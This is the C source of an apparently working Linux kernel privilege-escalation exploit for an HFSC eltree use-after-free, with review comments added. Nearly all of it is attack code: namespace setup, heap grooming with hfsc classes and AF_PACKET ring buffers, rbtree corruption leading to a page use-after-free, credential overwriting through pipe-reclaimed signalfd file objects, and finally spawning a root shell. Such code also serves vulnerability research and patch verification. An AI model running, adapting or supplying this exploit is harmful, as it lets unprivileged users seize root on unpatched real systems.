/*
 *    HFSC eltree Use-After-Free exploit (LTS 6.6, COS 6.1, 5.15)
 *      - D3vil (savy@syst3mfailure.io)
*/

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <string.h>
#include <byteswap.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/stat.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <signal.h>
#include <sys/signalfd.h>
#include <sys/resource.h>
#include <sys/utsname.h>

#include "netlink_utils.h"

#define PAGE_SIZE 0x1000 // NOTE(review): assumes 4 KiB pages on the target

// Sandbox: procfs files written by setup_sandbox() inside the new user namespace
#define UID_MAP   "/proc/self/uid_map"
#define GID_MAP   "/proc/self/gid_map"
#define SETGROUPS "/proc/self/setgroups"

// Network interfaces: rtnetlink message types passed to net_if()
#define ADD_LINK  RTM_NEWLINK
#define DEL_LINK  RTM_DELLINK
#define NO_PRIO 0 // NOTE(review): not referenced in this file

// Traffic control: rtnetlink message types passed to tc()
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS
#define SHOW_CLASS RTM_GETTCLASS

// Builds the tc handle "x:y" (major in the upper 16 bits, minor in the lower 16).
// NOTE(review): the arguments are not parenthesized, so only pass simple
// expressions (all callers in this file pass literals or `i + 1`).
#define TC_H(x, y) (x << 16 | y)

// Packet rings: local copies of AF_PACKET option/version values; they should
// match the definitions in <linux/if_packet.h>.
#define PACKET_TX_RING 13
#define PACKET_VERSION 10
#define TPACKET_V1 0

// Exploitation
#define MAX_RETRIES 5 // main() re-executes itself at most this many times

// Byte offsets inside struct file assumed by main(): the cred pointer (differs
// between kernel series; main() picks one at runtime) and private_data.
#define FILE_CRED_OFFSET_6_X 0x70
#define FILE_CRED_OFFSET_5_15 0x90
#define FILE_PRIVATE_DATA_OFFSET 0xc8

#define NUM_DUMMY_NET_IF 0x700      // NOTE(review): not referenced in this file
#define KMALLOC_1K_PARTIALS 0x700   // number of hfsc classes main() creates on dummy-0
#define KMALLOC_512_CHUNK_SIZE 512  // main() sizes pg_vec requests as this + 8
#define HFSC_CLASS_ELNODE_OFFSET 0xa0 // assumed el_node offset in struct hfsc_class (main() subtracts 8 on 5.15)
#define HFSC_CLASS_CHUNK_SIZE 1024 // kmalloc-1k chunk

// Index bounds into main()'s psocks[]/pages[] arrays (not counts):
// [0, BEFORE) are allocated before class 2:2, [BEFORE, AFTER) after it,
// [AFTER, TOTAL) after class 2:1 is deleted.
#define NUM_PGV_BEFORE 0x20
#define NUM_PGV_AFTER 0x40
#define NUM_PGV_TOTAL 0x60
#define NUM_PIPES 0x100  // pipes created by main()
#define NUM_SIGFD 0xa00  // signalfds created by main()

// Kernel series reported by get_kernel_version(); main() uses it to choose
// hfsc_class_elnode_offset. Values start at 1 so that -1 can mean "unknown".
enum {
    KVERS_5_15 = 1,
    KVERS_6_X,
};

// Associates a tc kind string (sent as TCA_KIND) with the function that
// appends that kind's TCA_OPTIONS to a request; tc() searches tc_handlers[].
struct tc_handle {
    char *name;
    void (*func)(struct nlmsghdr *msg, int cmd, void *opt);
};

// Optional argument for tc_handle_tbf(): when supplied, these values are sent
// as TCA_TBF_BURST / TCA_TBF_RATE64 instead of the built-in defaults.
struct tbf_custom_opt {
    uint32_t burst;
    uint64_t rate64;
};

// Per-kind option builders; `cmd` is the rtnetlink message type and `opt`
// an optional kind-specific argument.
void tc_handle_tbf(struct nlmsghdr *msg, int cmd, void *opt);
void tc_handle_hfsc(struct nlmsghdr *msg, int cmd, void *opt);
void tc_handle_netem(struct nlmsghdr *msg, int cmd, void *opt);

// Dispatch table searched linearly by tc(). A kind missing from this table
// is still sent, just without any TCA_OPTIONS.
struct tc_handle tc_handlers[] = {
    { "tbf",   tc_handle_tbf   },
    { "hfsc",  tc_handle_hfsc  },
    { "netem", tc_handle_netem },
};

/*
 * Pin the calling process to a single CPU.
 *
 * @core_id: index of the CPU the process may run on.
 *
 * Returns 0 on success, or -1 after printing the sched_setaffinity() error.
 */
int assign_to_core(int core_id) {
    cpu_set_t cpus;

    CPU_ZERO(&cpus);
    CPU_SET(core_id, &cpus);

    int rc = sched_setaffinity(getpid(), sizeof(cpus), &cpus);
    if (rc >= 0)
        return 0;

    perror("[x] sched_setaffinity()");
    return -1;
}

/*
 * Write `size` bytes from `data` to `path`, creating the file with mode 0777
 * if it does not exist.
 *
 * The file is NOT truncated, so any existing bytes past `size` are kept. The
 * procfs id-map and setgroups files written by setup_sandbox() rely on this
 * plain open+write sequence.
 *
 * Returns 0 on success, or -1 if open() or write() fails.
 * NOTE(review): a short write is still reported as success.
 */
int write_file(char *path, char *data, size_t size) {
    int fd = open(path, O_WRONLY | O_CREAT, 0777);
    if (fd < 0)
        return -1;

    ssize_t written = write(fd, data, size);
    close(fd);

    return (written < 0) ? -1 : 0;
}

/*
 * Write a single-entry id mapping "<in> <out> 1" to an id-map file such as
 * /proc/self/uid_map. That is, id `in` inside the namespace maps to `out`
 * outside it, with a range length of 1.
 *
 * Returns 0 on success, or -1 after printing an error if write_file() fails.
 */
int new_map(char *path, int in, int out) {
    char line[0x40] = { 0 };

    snprintf(line, sizeof(line), "%d %d 1", in, out);

    if (write_file(path, line, strlen(line)) >= 0)
        return 0;

    perror("[x] new_map() - write()");
    return -1;
}

/*
 * Raise the soft RLIMIT_NOFILE limit to the current hard limit, presumably
 * so that main() can hold its many pipes, sockets and signalfds at once.
 *
 * Best effort: failures are printed and otherwise ignored.
 */
void ulimit_max(void) {
    struct rlimit lim;

    if (getrlimit(RLIMIT_NOFILE, &lim) < 0) {
        perror("[x] getrlimit()");
        return;
    }

    lim.rlim_cur = lim.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &lim) < 0)
        perror("[x] setrlimit()");
}

/*
 * Move the process into new mount, user and network namespaces. Inside the
 * new user namespace, map uid/gid 0 to the caller's original uid/gid, then
 * raise the open-file limit via ulimit_max().
 *
 * Returns -1 if unshare() fails, and 0 otherwise. Failures while writing the
 * setgroups or id-map files are deliberately not reported to the caller.
 */
int setup_sandbox(void) {
    int outer_uid = getuid();
    int outer_gid = getgid();

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
        return -1;
    }

    // An unprivileged process must deny setgroups before it may write gid_map.
    write_file(SETGROUPS, "deny", strlen("deny"));
    new_map(UID_MAP, 0, outer_uid);
    new_map(GID_MAP, 0, outer_gid);

    ulimit_max();
    return 0;
}

/*
 * Create an AF_PACKET socket and attach a TPACKET_V1 TX ring to it.
 *
 * @size:  byte count used to derive the ring's block count
 *         (tp_block_nr = size / sizeof(void *)).
 * @order: each ring block is PAGE_SIZE << order bytes.
 *
 * Frames are PAGE_SIZE bytes, so each block holds (1 << order) frames. The
 * ring can be mapped with mmap_pg_vec().
 *
 * Returns the socket fd, or -1 on failure. The socket is closed on every
 * error path; the original code leaked it when either setsockopt() failed.
 */
int alloc_pg_vec(uint32_t size, uint32_t order) {
    int s = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (s < 0) {
        perror("[x] socket(AF_PACKET)");
        return -1;
    }

    int version = TPACKET_V1;
    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(int)) < 0) {
        perror("[x] setsockopt(PACKET_VERSION)");
        close(s);
        return -1;
    }

    uint32_t block_size = PAGE_SIZE << order;
    struct tpacket_req req = {
        .tp_block_size = block_size,
        .tp_frame_size = PAGE_SIZE,
        .tp_block_nr   = size / sizeof(void *),
    };

    // Fill every block completely with PAGE_SIZE frames.
    req.tp_frame_nr = (block_size * req.tp_block_nr) / req.tp_frame_size;

    if (setsockopt(s, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) {
        perror("[x] setsockopt(PACKET_TX_RING)");
        close(s);
        return -1;
    }

    return s;
}

/*
 * Map the first `size` bytes of fd `s` as a shared read/write mapping. The
 * fd is normally a packet socket returned by alloc_pg_vec().
 *
 * Returns the mapping address, or MAP_FAILED on error (plain mmap() result,
 * which callers must check themselves).
 */
char *mmap_pg_vec(int s, size_t size) {
    void *mapping = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED, s, 0);
    return mapping;
}

/*
 * Send an rtnetlink link request (typically ADD_LINK or DEL_LINK).
 *
 * @cmd:    rtnetlink message type. ADD_LINK also attaches IFLA_MTU (65535),
 *          IFLA_IFNAME and a nested IFLA_LINKINFO/IFLA_INFO_KIND. DEL_LINK
 *          resolves the interface index by name. Any other type sends only
 *          the ifinfomsg header.
 * @type:   link kind (IFLA_INFO_KIND); also the base of the interface name.
 * @num:    if >= 0 the interface is named "<type>-<num>", otherwise "<type>".
 * @flags:  value stored in ifi_flags (e.g. IFF_UP).
 * @change: when non-zero, ifi_change is set to 1.
 *          NOTE(review): 1 == IFF_UP, so only that flag bit is requested to change.
 *
 * Returns the result of nl_complete_request(), or -1 if nl_init_request() fails.
 */
int net_if(int cmd, char *type, int num, int flags, int change) {
    struct nlmsghdr *msg;
    struct ifinfomsg ifinfo = {};
    char name[0x100] = { 0 };

    // Bounded formatting: a long `type` is truncated instead of overflowing
    // `name`, which the previous strcpy() could do.
    if (num >= 0)
        snprintf(name, sizeof(name), "%s-%d", type, num);
    else
        snprintf(name, sizeof(name), "%s", type);

    int sk = nl_init_request(cmd, &msg, NLM_F_REQUEST|NLM_F_CREATE);
    if (sk < 0) {
        perror("net_if() - nl_init_request()");
        return -1;
    }

    ifinfo.ifi_family = AF_UNSPEC;
    ifinfo.ifi_type = PF_NETROM;
    ifinfo.ifi_index = (cmd == DEL_LINK) ? if_nametoindex(name) : 0;
    ifinfo.ifi_flags = flags;
    ifinfo.ifi_change = change ? 1 : 0;

    nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

    if (cmd == ADD_LINK) {
        struct nlmsghdr *options = nlmsg_alloc();
        nla_put_u32(msg, IFLA_MTU, 65535);
        nla_put_string(msg, IFLA_IFNAME, name);
        nla_put_string(options, IFLA_INFO_KIND, type);
        nla_put_nested(msg, IFLA_LINKINFO, options);
        nlmsg_free(options);
    }

    return nl_complete_request(sk, msg);
}

/*
 * Start an rtnetlink traffic-control request. Opens the request via
 * nl_init_request(), then appends a struct tcmsg and the TCA_KIND attribute.
 * The caller adds kind-specific attributes and sends the message with
 * tc_complete_request().
 *
 * @msg:    out-parameter that receives the new message.
 * @cmd:    rtnetlink message type (ADD_QDISC, ADD_CLASS, SHOW_CLASS, ...).
 * @name:   tc kind string stored in TCA_KIND.
 * @net_if: interface name, resolved with if_nametoindex() (0 if not found).
 * @handle: value for tcm_handle.
 * @parent: value for tcm_parent.
 * @change: SHOW_CLASS always gets NLM_F_DUMP. For other commands, a non-zero
 *          value omits NLM_F_CREATE so that the request targets an existing
 *          object.
 *
 * Returns the netlink socket, or -1 if nl_init_request() fails.
 */
int tc_init_request(struct nlmsghdr **msg, int cmd, char *name, char *net_if, int handle, int parent, int change) {
    struct tcmsg tchdr = {};
    int flags = NLM_F_REQUEST;

    if (cmd == SHOW_CLASS)
        flags |= NLM_F_DUMP;
    else if (!change)
        flags |= NLM_F_CREATE;

    int sk = nl_init_request(cmd, msg, flags);
    if (sk < 0) {
        // The message now names this function (it previously said "tc_prepare_msg()").
        perror("tc_init_request() - nl_init_request()");
        return -1;
    }

    tchdr.tcm_family  = AF_UNSPEC;
    tchdr.tcm_ifindex = if_nametoindex(net_if);
    tchdr.tcm_handle  = handle;
    tchdr.tcm_parent  = parent;
    tchdr.tcm_info    = 0;

    nlmsg_append(*msg, &tchdr, sizeof(struct tcmsg), NLMSG_ALIGNTO);
    nla_put_string(*msg, TCA_KIND, name);

    return sk;
}

/*
 * Finish a request started by tc_init_request(). This is a thin wrapper
 * around nl_complete_request() and returns its result unchanged.
 * Send/ack semantics are whatever netlink_utils.h implements (not visible
 * here).
 */
int tc_complete_request(int sk, struct nlmsghdr *msg) {
    int status = nl_complete_request(sk, msg);
    return status;
}

void tc_handle_tbf(struct nlmsghdr *msg, int cmd, void *opt) {
    if (cmd == ADD_QDISC) {
        struct nlmsghdr *options = nlmsg_alloc();
        struct tc_tbf_qopt qopt = { .limit = 10000 };
        uint32_t burst  = 100000;
        uint64_t rate64 = 100000;

        if (opt) {
            struct tbf_custom_opt *custom = (struct tbf_custom_opt *)opt;
            burst = custom->burst;
            rate64 = custom->rate64;
        }

        nla_put(options, TCA_TBF_PARMS, sizeof(qopt), &qopt);
        nla_put_u32(options, TCA_TBF_BURST, burst);
        nla_put_u64(options, TCA_TBF_RATE64, rate64);
        nla_put_nested(msg, TCA_OPTIONS, options);
        nlmsg_free(options);
    }
}

void tc_handle_hfsc(struct nlmsghdr *msg, int cmd, void *opt) {
    if (cmd == ADD_QDISC) {
        struct tc_hfsc_qopt qopt = { .defcls = 0 };

        nla_put(msg, TCA_OPTIONS, sizeof(qopt), &qopt);
    } else if (cmd == ADD_CLASS) {
        struct nlmsghdr *options = nlmsg_alloc();
        struct tc_service_curve copt = { .m2 = 1000 };

        nla_put(options, TCA_HFSC_RSC, sizeof(copt), &copt);
        nla_put_nested(msg, TCA_OPTIONS, options);
        nlmsg_free(options);
    }
}

void tc_handle_netem(struct nlmsghdr *msg, int cmd, void *opt) {
    if (cmd == ADD_QDISC) {
        struct tc_netem_qopt opt = {
            .limit = 1000,
            .duplicate = -1,
        };
        nla_put(msg, TCA_OPTIONS, sizeof(opt), &opt);
    }
}

int tc(int cmd, char *name, char *net_if, int handle, int parent, void *opt, int change) {
    struct nlmsghdr *msg;

    int sk = tc_init_request(&msg, cmd, name, net_if, handle, parent, change);
    if (sk < 0)
        return -1;

    for (int i = 0; i < sizeof(tc_handlers) / sizeof(tc_handlers[0]); i++) {
        if (!strcmp(name, tc_handlers[i].name)) {
            tc_handlers[i].func(msg, cmd, opt);
            break;
        }
    }

    return tc_complete_request(sk, msg);
}

/*
 * Send `pkt_num` raw IPv4 packets of `pkt_size` bytes out of `if_name`.
 *
 * Uses a SOCK_RAW/IPPROTO_RAW socket bound to the interface with
 * SO_BINDTODEVICE. Packet i is filled with the byte (i & 0xff), and the
 * destination is 0xdeadbeef as stored in sin_addr (no byte swapping).
 * If `prio` > 0 it is applied with SO_PRIORITY; main() passes tc handles
 * here.
 *
 * Returns 0 once every packet has been sent. On any failure it prints the
 * error, releases the buffer and socket, and returns -1.
 */
int send_packets(uint8_t *if_name, size_t pkt_size, uint64_t pkt_num, int prio) {
    struct sockaddr_in dst = {};
    struct ifreq ifr = {};
    int ret = -1;
    int s = -1;

    char *pkt = calloc(1, pkt_size);
    if (!pkt)
        return -1;

    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("[x] socket(SOCK_RAW)");
        goto out;
    }

    // snprintf always NUL-terminates. strncpy(..., IFNAMSIZ) left ifr_name
    // unterminated for names of IFNAMSIZ or more characters.
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", (const char *)if_name);

    if (setsockopt(s, SOL_SOCKET, SO_BINDTODEVICE, ifr.ifr_name, IFNAMSIZ) < 0) {
        perror("[x] setsockopt(SO_BINDTODEVICE)");
        goto out;
    }

    if (prio > 0 && setsockopt(s, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio)) < 0) {
        perror("[x] setsockopt(SO_PRIORITY)");
        goto out;
    }

    dst.sin_family = AF_INET;
    dst.sin_addr.s_addr = 0xdeadbeef;

    for (uint64_t i = 0; i < pkt_num; i++) {
        // memset() stores only the low byte of its fill value.
        memset(pkt, (int)(i & 0xff), pkt_size);
        if (sendto(s, pkt, pkt_size, 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
            perror("[x] sendto()");
            goto out;
        }
    }

    ret = 0;

out:
    free(pkt);
    if (s >= 0)
        close(s);
    return ret;
}

/*
 * Create or update a signalfd whose requested mask is the 64-bit all-ones
 * value below.
 *
 * @sfd: -1 to create a new signalfd, or an existing signalfd to update its
 *       mask in place (signalfd(2) semantics).
 *
 * Returns the fd from signalfd() (for an update this is `sfd` itself), or -1
 * after printing the error.
 *
 * NOTE(review): `mask` is only 8 bytes, while glibc's sigset_t is larger.
 * This relies on the libc signalfd() wrapper passing just the kernel-sized
 * (8-byte) prefix to the syscall. Confirm this if building against another
 * libc.
 */
int alloc_signalfd(int sfd) {
    uint64_t mask = -1;
    int fd = signalfd(sfd, (sigset_t *)&mask, 0);
    if (fd < 0) {
        perror("[x] signalfd()");
        return -1;
    }
    return fd;
}

/*
 * Classify the running kernel from the uname(2) release string.
 *
 * Returns:
 *   KVERS_6_X  if the release contains "6.6" or "6.1",
 *   KVERS_5_15 otherwise, if it contains "5.15",
 *   -1         otherwise (prints "unknown"), or if uname() fails (prints the error).
 *
 * NOTE(review): this is plain substring matching, so e.g. "6.10.x" also
 * matches "6.1".
 */
int get_kernel_version(void) {
    struct utsname uts;

    if (uname(&uts) != 0) {
        perror("uname");
        return -1;
    }

    const char *rel = uts.release;
    if (strstr(rel, "6.6") || strstr(rel, "6.1"))
        return KVERS_6_X;
    if (strstr(rel, "5.15"))
        return KVERS_5_15;

    puts("unknown");
    return -1;
}

/*
 * Exploit driver. The visible flow is:
 *   1. Pin to CPU 0, enter new user/net/mount namespaces, bring up "lo" and
 *      create "dummy-0".
 *   2. On "lo", build tbf (1:) -> hfsc (2:). On "dummy-0", create an hfsc
 *      qdisc with KMALLOC_1K_PARTIALS classes.
 *   3. Interleave hfsc classes 2:1 / 2:2 on "lo" with packet-ring (pg_vec)
 *      allocations, send packets, then delete/update/delete classes (see the
 *      tree diagrams below).
 *   4. Find the pg_vec mappings that observe the corruption, release them
 *      via munmap()/close(), refill with pipe buffers and then signalfd
 *      files, and rewrite those files through the pipe.
 *   5. If /proc/sys/kernel/modprobe then opens O_RDWR, spawn a shell.
 *      Otherwise re-exec this binary, at most MAX_RETRIES times.
 *
 * argv[1] (optional) is the retry counter handed back on re-exec.
 *
 * NOTE(review): `void main` is non-standard (should return int), and most
 * syscall return values below are not checked.
 * NOTE(review): several tree-diagram lines end in a backslash. That splices
 * the next line into the same // comment, which is harmless here because the
 * next line is always a comment too (-Wcomment warns about it).
 */
void main(int argc, char *argv[]) {
    char buff[PAGE_SIZE] = { 0 };
    char *pages[NUM_PGV_TOTAL];
    int sigfd[NUM_SIGFD] = { 0 };
    int pipes[NUM_PIPES][2];
    int psocks[NUM_PGV_TOTAL];
    int psock_a, psock_b;
    uint64_t *page_a = NULL;
    uint64_t *page_b = NULL;
    uint64_t *page = NULL;
    uint64_t hfsc_elnode = 0;
    int p = -1;
    struct tbf_custom_opt tbf_custom_opt = { };
    char retries_str[2] = { 0 }; // one digit + NUL; retries never exceeds MAX_RETRIES (5) when used
    int retries = argc > 1 ? atoi(argv[1]) : 0;
    int kvers = get_kernel_version();

    size_t pgv_size = KMALLOC_512_CHUNK_SIZE + 8; // Minimum size to allocate a pg_vec in kmalloc-1k
    // Bytes mapped per packet socket: one PAGE_SIZE block per pg_vec entry (order 0).
    size_t total_size = pgv_size / sizeof(void *) * PAGE_SIZE;
    // Only the el_node offset depends on kvers; the cred offset is detected later from the leaked page.
    uint64_t hfsc_class_elnode_offset =
        kvers == KVERS_5_15 ? (HFSC_CLASS_ELNODE_OFFSET - 8) : HFSC_CLASS_ELNODE_OFFSET;

    // Park a memfd at fd 696. NOTE(review): its purpose is not visible in this file; confirm.
    int m = memfd_create("", 0);
    dup2(m, 696);
    close(m);

    assign_to_core(0);
    setup_sandbox();

    net_if(ADD_LINK, "lo", -1, IFF_UP, true);
    net_if(ADD_LINK, "dummy", 0, IFF_UP, true);

    for (int i = 0; i < NUM_PIPES; i++)
        pipe(pipes[i]);

    // Root tbf on "lo" with burst 100 and rate64 1, and an hfsc qdisc (2:) beneath it.
    tbf_custom_opt.burst  = 100;
    tbf_custom_opt.rate64 = 1;
    tc(ADD_QDISC, "tbf",  "lo", TC_H(1, 0), TC_H_ROOT, &tbf_custom_opt, 0);
    tc(ADD_QDISC, "hfsc", "lo", TC_H(2, 0), TC_H(1, 0), NULL, 0);
    send_packets("lo", 64, 2, 0);

    tc(ADD_QDISC, "hfsc", "dummy-0", TC_H(1, 0), TC_H_ROOT, NULL, 0);

    // Create KMALLOC_1K_PARTIALS hfsc classes (HFSC_CLASS_CHUNK_SIZE objects) on dummy-0.
    for (int i = 0; i < KMALLOC_1K_PARTIALS; i++)
        tc(ADD_CLASS, "hfsc", "dummy-0", TC_H(1, i + 1), TC_H(1, 0), NULL, 0);

    // Class 2:1 on "lo" gets a netem child qdisc (3:) configured with duplicate = -1.
    tc(ADD_CLASS, "hfsc",  "lo", TC_H(2, 1), TC_H(2, 0), NULL, 0);
    tc(ADD_QDISC, "netem", "lo", TC_H(3, 0), TC_H(2, 1), NULL, 0);

    // Surround class 2:2's allocation with pg_vec allocations on both sides.
    for (int i = 0; i < NUM_PGV_BEFORE; i++)
        psocks[i] = alloc_pg_vec(pgv_size, 0);

    tc(ADD_CLASS, "hfsc",  "lo", TC_H(2, 2), TC_H(2, 0), NULL, 0);

    for (int i = NUM_PGV_BEFORE; i < NUM_PGV_AFTER; i++)
        psocks[i] = alloc_pg_vec(pgv_size, 0);

    // SO_PRIORITY is set to handle 2:1 for these packets.
    send_packets("lo", 64, 2, TC_H(2, 1));

    //
    //                  A (2:1, root)
    //                 /
    //                A (2:1, dupe)
    //

    tc(DEL_CLASS, "hfsc", "lo", TC_H(2, 1), 0, NULL, 0);

    // Allocate and map the last pg_vec batch. NOTE(review): mmap results are not checked for MAP_FAILED.
    for (int i = NUM_PGV_AFTER; i < NUM_PGV_TOTAL; i++) {
        psocks[i] = alloc_pg_vec(pgv_size, 0);
        pages[i] = mmap_pg_vec(psocks[i], total_size);
        for (int j = 0; j < total_size; j += PAGE_SIZE)
            pages[i][j] = 1; // For each page, fake RB_BLACK __rb_parent_color
    }

    //
    //                 P1
    //                  |
    //                  A (2:1)
    //                 / \
    //            P3 (P)  P2
    //

    send_packets("lo", 64, 1, TC_H(2, 2)); // Insert

    // RBTree now:
    //
    //                  A (2:1)
    //                 / \
    //            P3 (P)  P2
    //                 \
    //                  C (2:2)
    //
    //
    // But if we look at it from P's perspective, the node color is RB_BLACK:
    //
    //
    //                 1 (Fake RB_BLACK)
    //                 ^
    //                 |
    //                 P
    //                  \
    //                   C (2:2)
    //

    // Scan the last batch: the first mapping containing any 0xFF byte is taken
    // as the one that was written to (presumably kernel pointers; the pages
    // were only filled with 0/1 above). The outer loop stops at that mapping
    // even if no page in it passes the qword check.
    for (int i = NUM_PGV_AFTER; i < NUM_PGV_TOTAL; i++) {
        page = (uint64_t *)pages[i];
        if (memchr(page, 0xFF, total_size) != NULL) {
            for (int j = 0; j < total_size / sizeof(void *); j += (PAGE_SIZE / sizeof(void *))) {
                if (page[j + 1] > 1) { // We expect the second qword in the page to be the 2:2 class pointer
                    psock_a = psocks[i];
                    page_a = (uint64_t *)page;
                    hfsc_elnode = page[j + 1]; // C is P->rb_right, so second qword in the page
                    break;
                }
            }
            break;
        }
    }

    if (!hfsc_elnode) {
        tc(DEL_CLASS, "hfsc", "lo", TC_H(2, 2), 0, NULL, 0);
        goto retry;
    }

    // Evil Grandpa infiltrates the rbtree:
    // overwrite the first qword of every page in mapping A with target_pgv - 0x10.
    uint64_t hfsc_class = hfsc_elnode - hfsc_class_elnode_offset;
    uint64_t target_pgv = hfsc_class + HFSC_CLASS_CHUNK_SIZE; // class 2:2 + 1024, aka the next object in memory
    for (int i = 0; i < total_size; i += PAGE_SIZE)
        *(uint64_t *)((char *)page_a + i) = target_pgv - 0x10;

    //
    //                 E (Evil Grandpa)
    //               / ^
    //              T  |
    //                 P
    //                  \
    //                   C (2:2)
    //

    tc(ADD_CLASS, "hfsc",  "lo", TC_H(2, 2), TC_H(2, 0), NULL, 1); // Update

    // Class 2:2 is deleted:
    //
    //                 E (Evil Grandpa)
    //               / ^
    //              T  |
    //                 P
    //                  \
    //                   x
    //
    // Then re-inserted:
    //
    //                 E (Evil Grandpa)
    //               / ^
    //              T  |
    //                 P
    //                  \
    //                   C (2:2)
    //
    // And the tree rebalanced:
    //
    //                 x
    //                  \
    //                   C (2:2)
    //                  /
    //                 P
    //
    //                   C (2:2)
    //                  / \
    //                 P   E
    //                    /
    //                   T (NULL)
    //

    tc(DEL_CLASS, "hfsc",  "lo", TC_H(2, 2), 0, NULL, 0); // Delete

    // P is moved from C rb_left to E rb_left
    //
    //                 C
    //                / \
    //               x   E
    //                  /
    //                 P (TARGET = P) Pwned!
    //
    // Then class 2:2 is deleted:
    //
    //                 x
    //                  \
    //                   E
    //                  /
    //                 P
    //

    // Find the duplicate page: map the earlier pg_vec sockets and take the
    // first mapping that contains a 0xFF byte.
    for (int i = 0; i < NUM_PGV_AFTER; i++) {
        pages[i] = mmap_pg_vec(psocks[i], total_size); // The page is re-mapped, counter -> 3
        page = (uint64_t *)pages[i];
        if (memchr(page, 0xFF, total_size) != NULL) {
            psock_b = psocks[i];
            page_b = (uint64_t *)page;
            break;
        }
    }

    if (!page_b)
        goto retry;

    munmap(page_a, total_size); // counter = 3 -> 2
    munmap(page_b, total_size); // counter = 2 -> 1
    close(psock_a);             // counter = 1 -> 0 -> free

    // Page reclaimed, counter = 1
    for (int i = 0; i < NUM_PIPES; i++)
        write(pipes[i][1], buff, PAGE_SIZE);

    close(psock_b); // counter = 0 -> free (page-UAF)

    // Get root by setting the task credentials to zero via signalfd4()
    for (int i = 0; i < NUM_SIGFD; i++)
        sigfd[i] = alloc_signalfd(-1);

    // From here on, `page` aliases `buff`.
    page = (uint64_t *)buff;

    // Find the page containing signalfd files: the first pipe whose data now contains a 0xFF byte.
    for (int i = 0; i < NUM_PIPES; i++) {
        read(pipes[i][0], buff, PAGE_SIZE);
        if (memchr(buff, 0xFF, PAGE_SIZE) != NULL) {
            p = i;
            break;
        }
    }

    if (p < 0)
        goto retry;

    // Choose the cred offset by inspecting the leaked page: zero at the 6.x offset means 5.15 layout.
    uint64_t cred_offset = FILE_CRED_OFFSET_6_X;
    if (!page[FILE_CRED_OFFSET_6_X/sizeof(uint64_t)])
        cred_offset = FILE_CRED_OFFSET_5_15;

    // 48 / 2 + 1 = 25 passes, stepping the target down by sizeof(uint16_t) each pass.
    uint64_t num_writes = 48 / sizeof(uint16_t) + 1;
    uint64_t file_chunk_size = 0x100;

    // Only the first two file objects in the page are processed (the full count is left commented out).
    uint64_t num_files_per_page = 2; // PAGE_SIZE / file_chunk_size;

    // For each pass and each file object: point private_data at
    // cred + 48 - 2*i, push the page back through the pipe and read it
    // again, then re-issue signalfd() on every signalfd.
    for (int i = 0; i < num_writes; i++) {
        for (int j = 0; j < num_files_per_page; j++) {
            uint64_t file_object_offset = file_chunk_size * j / sizeof(uint64_t);
            uint64_t file_cred_offset = cred_offset / sizeof(uint64_t);
            uint64_t file_private_data_offset = FILE_PRIVATE_DATA_OFFSET / sizeof(uint64_t);

            uint64_t cred = page[file_object_offset +  file_cred_offset];
            page[file_object_offset + file_private_data_offset] = cred + 48 - i * sizeof(uint16_t);

            write(pipes[p][1], page, PAGE_SIZE);
            read(pipes[p][0], page, PAGE_SIZE);

            for (int k = 0; k < NUM_SIGFD; k++)
                alloc_signalfd(sigfd[k]);
        }
    }

    // Success check: opening this sysctl read/write is used as the test for
    // elevated privileges (presumably it requires global root; confirm).
    int fd = open("/proc/sys/kernel/modprobe", O_RDWR);
    if (fd < 0)
        goto retry;

    system("PS1=\"r0o0ot # \" /bin/sh");
    exit(0);

retry:
    if (++retries > MAX_RETRIES)
        return;

    // 0x100 and 0xa00 equal NUM_PIPES and NUM_SIGFD; only pipe read ends are closed here.
    for (int i = 0; i < 0x100; i++)
        close(pipes[i][0]);

    for (int i = 0; i < 0xa00; i++)
        close(sigfd[i]);

    // Re-execute this binary with the updated retry counter as argv[1].
    printf("retrying (%d/%d)\n", retries, MAX_RETRIES);
    snprintf(retries_str, sizeof(retries_str), "%d", retries);
    char *args[] = { argv[0], retries_str, NULL };
    execv(args[0], args);
}
